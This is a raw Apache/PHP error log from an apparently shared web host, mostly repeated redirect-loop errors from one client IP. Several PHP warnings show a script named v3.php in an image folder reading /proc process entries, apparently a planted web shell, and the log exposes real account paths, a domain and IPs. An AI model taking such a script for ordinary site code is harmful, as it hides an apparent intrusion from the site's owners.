[Tue May 12 04:45:20.088243 2026] [core:error] [pid 1825179:tid 1825202] [client 172.190.142.176:32379] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:20.494217 2026] [core:error] [pid 1820198:tid 1820213] [client 172.190.142.176:9035] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:20.494243 2026] [core:error] [pid 1820198:tid 1820213] [client 172.190.142.176:9035] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:20.926296 2026] [core:error] [pid 1825287:tid 1825314] [client 172.190.142.176:7614] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:20.926332 2026] [core:error] [pid 1825287:tid 1825314] [client 172.190.142.176:7614] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:21.366620 2026] [core:error] [pid 1825179:tid 1825211] [client 172.190.142.176:60760] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:21.366652 2026] [core:error] [pid 1825179:tid 1825211] [client 172.190.142.176:60760] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:21.791227 2026] [core:error] [pid 1820198:tid 1820223] [client 172.190.142.176:19908] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:21.791252 2026] [core:error] [pid 1820198:tid 1820223] [client 172.190.142.176:19908] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:22.332861 2026] [core:error] [pid 1825179:tid 1825204] [client 172.190.142.176:19938] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:22.332898 2026] [core:error] [pid 1825179:tid 1825204] [client 172.190.142.176:19938] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:22.795426 2026] [core:error] [pid 1825287:tid 1825322] [client 172.190.142.176:9044] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:22.795459 2026] [core:error] [pid 1825287:tid 1825322] [client 172.190.142.176:9044] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:23.397788 2026] [core:error] [pid 1730207:tid 1730229] [client 172.190.142.176:19907] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:23.397834 2026] [core:error] [pid 1730207:tid 1730229] [client 172.190.142.176:19907] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:23.872101 2026] [core:error] [pid 1820198:tid 1820216] [client 172.190.142.176:9069] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:23.872127 2026] [core:error] [pid 1820198:tid 1820216] [client 172.190.142.176:9069] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:24.302581 2026] [core:error] [pid 1730207:tid 1730227] [client 172.190.142.176:9087] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:24.302614 2026] [core:error] [pid 1730207:tid 1730227] [client 172.190.142.176:9087] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:24.673745 2026] [core:error] [pid 1825179:tid 1825220] [client 172.190.142.176:32349] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:24.673776 2026] [core:error] [pid 1825179:tid 1825220] [client 172.190.142.176:32349] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:25.085441 2026] [core:error] [pid 1825179:tid 1825216] [client 172.190.142.176:9064] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:25.085475 2026] [core:error] [pid 1825179:tid 1825216] [client 172.190.142.176:9064] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:25.469099 2026] [core:error] [pid 1808852:tid 1808860] [client 172.190.142.176:32352] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:25.469133 2026] [core:error] [pid 1808852:tid 1808860] [client 172.190.142.176:32352] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:25.867300 2026] [core:error] [pid 1730175:tid 1730195] [client 172.190.142.176:9028] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:25.867336 2026] [core:error] [pid 1730175:tid 1730195] [client 172.190.142.176:9028] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:26.248762 2026] [core:error] [pid 1825179:tid 1825213] [client 172.190.142.176:14278] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:26.248798 2026] [core:error] [pid 1825179:tid 1825213] [client 172.190.142.176:14278] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:26.636909 2026] [core:error] [pid 1730207:tid 1730231] [client 172.190.142.176:32367] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:26.636936 2026] [core:error] [pid 1730207:tid 1730231] [client 172.190.142.176:32367] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:27.134167 2026] [core:error] [pid 1808852:tid 1808862] [client 172.190.142.176:15490] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:27.134210 2026] [core:error] [pid 1808852:tid 1808862] [client 172.190.142.176:15490] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:27.571195 2026] [core:error] [pid 1730175:tid 1730200] [client 172.190.142.176:14272] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:27.571225 2026] [core:error] [pid 1730175:tid 1730200] [client 172.190.142.176:14272] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:27.963783 2026] [core:error] [pid 1825287:tid 1825328] [client 172.190.142.176:14315] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:27.963813 2026] [core:error] [pid 1825287:tid 1825328] [client 172.190.142.176:14315] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:28.371867 2026] [core:error] [pid 1820198:tid 1820212] [client 172.190.142.176:32339] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:28.371911 2026] [core:error] [pid 1820198:tid 1820212] [client 172.190.142.176:32339] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:28.442831 2026] [authz_core:error] [pid 1825179:tid 1825219] [client 176.120.22.46:64795] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/l10n/error_log, referer: https://www.maelbailly.fr/wp-includes/l10n/
[Tue May 12 04:45:28.852271 2026] [core:error] [pid 1730207:tid 1730219] [client 172.190.142.176:14326] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:28.852294 2026] [core:error] [pid 1730207:tid 1730219] [client 172.190.142.176:14326] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:29.312417 2026] [core:error] [pid 1820198:tid 1820222] [client 172.190.142.176:32354] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:29.312448 2026] [core:error] [pid 1820198:tid 1820222] [client 172.190.142.176:32354] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:29.736046 2026] [core:error] [pid 1808852:tid 1808859] [client 172.190.142.176:14288] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:29.736080 2026] [core:error] [pid 1808852:tid 1808859] [client 172.190.142.176:14288] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:30.187128 2026] [core:error] [pid 1825179:tid 1825198] [client 172.190.142.176:9043] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:30.187163 2026] [core:error] [pid 1825179:tid 1825198] [client 172.190.142.176:9043] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:30.578226 2026] [core:error] [pid 1808852:tid 1808875] [client 172.190.142.176:19913] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:30.578256 2026] [core:error] [pid 1808852:tid 1808875] [client 172.190.142.176:19913] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:31.093716 2026] [core:error] [pid 1730207:tid 1730222] [client 172.190.142.176:14290] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:31.093746 2026] [core:error] [pid 1730207:tid 1730222] [client 172.190.142.176:14290] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:31.630385 2026] [core:error] [pid 1825287:tid 1825312] [client 172.190.142.176:55770] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:31.630418 2026] [core:error] [pid 1825287:tid 1825312] [client 172.190.142.176:55770] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:32.121868 2026] [core:error] [pid 1825287:tid 1825309] [client 172.190.142.176:9076] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:32.121911 2026] [core:error] [pid 1825287:tid 1825309] [client 172.190.142.176:9076] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:32.715081 2026] [core:error] [pid 1730207:tid 1730218] [client 172.190.142.176:19920] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:32.715115 2026] [core:error] [pid 1730207:tid 1730218] [client 172.190.142.176:19920] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:33.363628 2026] [core:error] [pid 1820198:tid 1820211] [client 172.190.142.176:9031] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:33.363661 2026] [core:error] [pid 1820198:tid 1820211] [client 172.190.142.176:9031] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:33.878755 2026] [core:error] [pid 1808852:tid 1808861] [client 172.190.142.176:60764] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:33.878785 2026] [core:error] [pid 1808852:tid 1808861] [client 172.190.142.176:60764] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:34.580492 2026] [core:error] [pid 1825287:tid 1825310] [client 172.190.142.176:32345] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:34.580519 2026] [core:error] [pid 1825287:tid 1825310] [client 172.190.142.176:32345] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:35.175283 2026] [core:error] [pid 1820198:tid 1820204] [client 172.190.142.176:32361] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:35.175326 2026] [core:error] [pid 1820198:tid 1820204] [client 172.190.142.176:32361] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:35.566057 2026] [core:error] [pid 1730175:tid 1730188] [client 172.190.142.176:9034] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:35.566081 2026] [core:error] [pid 1730175:tid 1730188] [client 172.190.142.176:9034] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:35.963319 2026] [core:error] [pid 1825287:tid 1825330] [client 172.190.142.176:60754] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:35.963342 2026] [core:error] [pid 1825287:tid 1825330] [client 172.190.142.176:60754] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:36.377218 2026] [core:error] [pid 1730207:tid 1730212] [client 172.190.142.176:19919] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:36.377253 2026] [core:error] [pid 1730207:tid 1730212] [client 172.190.142.176:19919] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:36.822690 2026] [core:error] [pid 1820198:tid 1820205] [client 172.190.142.176:19953] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:36.822722 2026] [core:error] [pid 1820198:tid 1820205] [client 172.190.142.176:19953] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:37.401848 2026] [core:error] [pid 1808852:tid 1808866] [client 172.190.142.176:55763] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:37.401877 2026] [core:error] [pid 1808852:tid 1808866] [client 172.190.142.176:55763] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:37.996324 2026] [core:error] [pid 1730207:tid 1730210] [client 172.190.142.176:14307] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:37.996357 2026] [core:error] [pid 1730207:tid 1730210] [client 172.190.142.176:14307] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174183/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174183/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174183/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174183/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174183/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174183/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 04:45:38.542599 2026] [core:error] [pid 1808852:tid 1808869] [client 172.190.142.176:32366] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:38.542631 2026] [core:error] [pid 1808852:tid 1808869] [client 172.190.142.176:32366] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:39.061394 2026] [core:error] [pid 1825287:tid 1825315] [client 172.190.142.176:14284] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:39.061425 2026] [core:error] [pid 1825287:tid 1825315] [client 172.190.142.176:14284] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:39.854847 2026] [core:error] [pid 1820198:tid 1820214] [client 172.190.142.176:19967] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:39.854878 2026] [core:error] [pid 1820198:tid 1820214] [client 172.190.142.176:19967] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:40.306717 2026] [core:error] [pid 1825287:tid 1825320] [client 172.190.142.176:55768] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:40.306757 2026] [core:error] [pid 1825287:tid 1825320] [client 172.190.142.176:55768] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:40.724016 2026] [core:error] [pid 1825179:tid 1825203] [client 172.190.142.176:9072] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:40.724051 2026] [core:error] [pid 1825179:tid 1825203] [client 172.190.142.176:9072] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:41.837357 2026] [core:error] [pid 1820198:tid 1820213] [client 172.190.142.176:19918] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:41.837393 2026] [core:error] [pid 1820198:tid 1820213] [client 172.190.142.176:19918] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:42.446092 2026] [core:error] [pid 1730207:tid 1730215] [client 172.190.142.176:60752] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:42.446127 2026] [core:error] [pid 1730207:tid 1730215] [client 172.190.142.176:60752] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:43.159025 2026] [core:error] [pid 1825179:tid 1825197] [client 172.190.142.176:9031] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:43.159056 2026] [core:error] [pid 1825179:tid 1825197] [client 172.190.142.176:9031] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:43.644395 2026] [core:error] [pid 1820198:tid 1820212] [client 172.190.142.176:9051] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:43.644443 2026] [core:error] [pid 1820198:tid 1820212] [client 172.190.142.176:9051] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:44.043717 2026] [core:error] [pid 1730175:tid 1730195] [client 172.190.142.176:9059] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:44.043746 2026] [core:error] [pid 1730175:tid 1730195] [client 172.190.142.176:9059] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:44.515083 2026] [core:error] [pid 1825287:tid 1825319] [client 172.190.142.176:14318] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:44.515119 2026] [core:error] [pid 1825287:tid 1825319] [client 172.190.142.176:14318] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:45.058303 2026] [core:error] [pid 1825179:tid 1825216] [client 172.190.142.176:19947] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:45.058336 2026] [core:error] [pid 1825179:tid 1825216] [client 172.190.142.176:19947] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:45.517175 2026] [core:error] [pid 1820198:tid 1820206] [client 172.190.142.176:19963] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:45.517209 2026] [core:error] [pid 1820198:tid 1820206] [client 172.190.142.176:19963] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:45.928764 2026] [core:error] [pid 1808852:tid 1808877] [client 172.190.142.176:55761] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:45.928798 2026] [core:error] [pid 1808852:tid 1808877] [client 172.190.142.176:55761] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:46.451179 2026] [core:error] [pid 1730175:tid 1730194] [client 172.190.142.176:14316] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:46.451210 2026] [core:error] [pid 1730175:tid 1730194] [client 172.190.142.176:14316] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:46.917303 2026] [core:error] [pid 1825287:tid 1825327] [client 172.190.142.176:32336] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
